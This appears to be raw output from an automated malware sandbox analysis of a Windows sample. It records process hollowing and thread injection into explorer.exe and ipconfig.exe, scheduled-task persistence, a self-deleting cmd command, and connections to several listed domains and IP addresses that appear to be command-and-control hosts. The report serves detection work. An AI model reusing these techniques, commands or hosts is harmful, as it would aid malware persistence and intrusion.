Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D83B7A mov eax, dword ptr fs:[00000030h] 15_2_00D83B7A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D5DB60 mov ecx, dword ptr fs:[00000030h] 15_2_00D5DB60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E28B58 mov eax, dword ptr fs:[00000030h] 15_2_00E28B58
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1131B mov eax, dword ptr fs:[00000030h] 15_2_00E1131B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E114FB mov eax, dword ptr fs:[00000030h] 15_2_00E114FB
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6CF0 mov eax, dword ptr fs:[00000030h] 15_2_00DD6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6CF0 mov eax, dword ptr fs:[00000030h] 15_2_00DD6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6CF0 mov eax, dword ptr fs:[00000030h] 15_2_00DD6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E28CD6 mov eax, dword ptr fs:[00000030h] 15_2_00E28CD6
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6849B mov eax, dword ptr fs:[00000030h] 15_2_00D6849B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEC450 mov eax, dword ptr fs:[00000030h] 15_2_00DEC450
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DEC450 mov eax, dword ptr fs:[00000030h] 15_2_00DEC450
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8A44B mov eax, dword ptr fs:[00000030h] 15_2_00D8A44B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D7746D mov eax, dword ptr fs:[00000030h] 15_2_00D7746D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6C0A mov eax, dword ptr fs:[00000030h] 15_2_00DD6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6C0A mov eax, dword ptr fs:[00000030h] 15_2_00DD6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6C0A mov eax, dword ptr fs:[00000030h] 15_2_00DD6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6C0A mov eax, dword ptr fs:[00000030h] 15_2_00DD6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E11C06 mov eax, dword ptr fs:[00000030h] 15_2_00E11C06
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E2740D mov eax, dword ptr fs:[00000030h] 15_2_00E2740D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E2740D mov eax, dword ptr fs:[00000030h] 15_2_00E2740D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E2740D mov eax, dword ptr fs:[00000030h] 15_2_00E2740D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8BC2C mov eax, dword ptr fs:[00000030h] 15_2_00D8BC2C
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E1FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E1FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E1FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E1FDE2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E08DF1 mov eax, dword ptr fs:[00000030h] 15_2_00E08DF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DD6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DD6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DD6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6DC9 mov ecx, dword ptr fs:[00000030h] 15_2_00DD6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DD6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DD6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6D5E0 mov eax, dword ptr fs:[00000030h] 15_2_00D6D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D6D5E0 mov eax, dword ptr fs:[00000030h] 15_2_00D6D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8FD9B mov eax, dword ptr fs:[00000030h] 15_2_00D8FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D8FD9B mov eax, dword ptr fs:[00000030h] 15_2_00D8FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E205AC mov eax, dword ptr fs:[00000030h] 15_2_00E205AC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E205AC mov eax, dword ptr fs:[00000030h] 15_2_00E205AC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D82581 mov eax, dword ptr fs:[00000030h] 15_2_00D82581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D82581 mov eax, dword ptr fs:[00000030h] 15_2_00D82581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D82581 mov eax, dword ptr fs:[00000030h] 15_2_00D82581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D82581 mov eax, dword ptr fs:[00000030h] 15_2_00D82581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D52D8A mov eax, dword ptr fs:[00000030h] 15_2_00D52D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D52D8A mov eax, dword ptr fs:[00000030h] 15_2_00D52D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D52D8A mov eax, dword ptr fs:[00000030h] 15_2_00D52D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D52D8A mov eax, dword ptr fs:[00000030h] 15_2_00D52D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D52D8A mov eax, dword ptr fs:[00000030h] 15_2_00D52D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D81DB5 mov eax, dword ptr fs:[00000030h] 15_2_00D81DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D81DB5 mov eax, dword ptr fs:[00000030h] 15_2_00D81DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D81DB5 mov eax, dword ptr fs:[00000030h] 15_2_00D81DB5
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D835A1 mov eax, dword ptr fs:[00000030h] 15_2_00D835A1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D77D50 mov eax, dword ptr fs:[00000030h] 15_2_00D77D50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D93D43 mov eax, dword ptr fs:[00000030h] 15_2_00D93D43
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DD3540 mov eax, dword ptr fs:[00000030h] 15_2_00DD3540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D7C577 mov eax, dword ptr fs:[00000030h] 15_2_00D7C577
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D7C577 mov eax, dword ptr fs:[00000030h] 15_2_00D7C577
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E28D34 mov eax, dword ptr fs:[00000030h] 15_2_00E28D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E1E539 mov eax, dword ptr fs:[00000030h] 15_2_00E1E539
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D63D34 mov eax, dword ptr fs:[00000030h] 15_2_00D63D34
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D84D3B mov eax, dword ptr fs:[00000030h] 15_2_00D84D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D84D3B mov eax, dword ptr fs:[00000030h] 15_2_00D84D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D84D3B mov eax, dword ptr fs:[00000030h] 15_2_00D84D3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D5AD30 mov eax, dword ptr fs:[00000030h] 15_2_00D5AD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00DDA537 mov eax, dword ptr fs:[00000030h] 15_2_00DDA537
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D836CC mov eax, dword ptr fs:[00000030h] 15_2_00D836CC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00D98EC7 mov eax, dword ptr fs:[00000030h] 15_2_00D98EC7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 15_2_00E0FEC0 mov eax, dword ptr fs:[00000030h] 15_2_00E0FEC0
Enables debug privileges
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.morumi.site
Source: C:\Windows\explorer.exe Domain query: www.firstcoastelope.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.27.68 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sherylabrahamphotography.com
Source: C:\Windows\explorer.exe Domain query: www.recruit-japan-hcm.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.231.69.84 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.joycasino-2020.club
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.genialnetero.com
Source: C:\Windows\explorer.exe Network Connect: 206.189.46.186 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.241.62.33 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.evrbrite.com
Source: C:\Windows\explorer.exe Domain query: www.website-bazar.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.115.5 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.cinmax.xyz
Source: C:\Windows\explorer.exe Domain query: www.marielivet.com
Source: C:\Windows\explorer.exe Domain query: www.blueberry-intl.com
Source: C:\Windows\explorer.exe Network Connect: 67.222.39.83 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thaihuay88.com
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Memory written: C:\Users\user\Desktop\08917506_by_Libranalysis.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3292 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1380000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\OfCxSfBf' /XML 'C:\Users\user\AppData\Local\Temp\tmpFA9B.tmp' Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Process created: C:\Users\user\Desktop\08917506_by_Libranalysis.exe C:\Users\user\Desktop\08917506_by_Libranalysis.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\08917506_by_Libranalysis.exe' Jump to behavior
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.493138403.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000007.00000000.254624885.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 0000000F.00000002.499457554.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.277780603.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
